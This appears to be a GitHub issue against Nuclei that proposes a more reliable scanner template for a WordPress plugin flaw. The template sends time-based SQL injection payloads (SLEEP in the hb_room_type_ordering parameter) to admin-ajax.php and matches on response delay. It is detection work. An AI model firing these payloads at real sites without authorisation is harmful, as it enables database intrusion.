Template IDs or paths
Environment
- OS: Fedoria
- Nuclei: 3.7.1
- Go: 1.25.8
Steps To Reproduce
- During testing, it was noticed that if the server took longer than 8 seconds to reasoned it would return with a false positive.
- It was also noticed that the first request to a WordPress site took up to 13 seconds.
Relevant dumped responses
I took the time to test and develop a more reliable version of the extension. Please have a look and let me know if this can be pushed to the main branch.
Possible solution:
http:
- raw:
# Request warming. First Wordpress request can take considably long to response to.
- |
@timeout: 30s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=x&taxonomy=hb_room_type&hb_room_type_ordering[1]=0 END, name=(SELECT SLEEP(0)), term_id=CASE when 1=1 THEN 1
- |
@timeout: 30s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=x&taxonomy=hb_room_type&hb_room_type_ordering[1]=0 END, name=(SELECT SLEEP(0)), term_id=CASE when 1=1 THEN 1
- |
@timeout: 30s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=x&taxonomy=hb_room_type&hb_room_type_ordering[1]=0 END, name=(SELECT SLEEP(4)), term_id=CASE when 1=1 THEN 1
req-condition: true
matchers:
- type: dsl
condition: and
dsl:
- 'to_number(duration_3) >= to_number((duration_2 + 2))'
- 'status_code_2 == 400'
- 'contains(content_type_2, "text/html")'
extractors:
- type: dsl
dsl:
- duration_2
- duration_3Anything else?
No response
Template IDs or paths
Environment
Steps To Reproduce
Relevant dumped responses
I took the time to test and develop a more reliable version of the extension. Please have a look and let me know if this can be pushed to the main branch.
Possible solution:
Anything else?
No response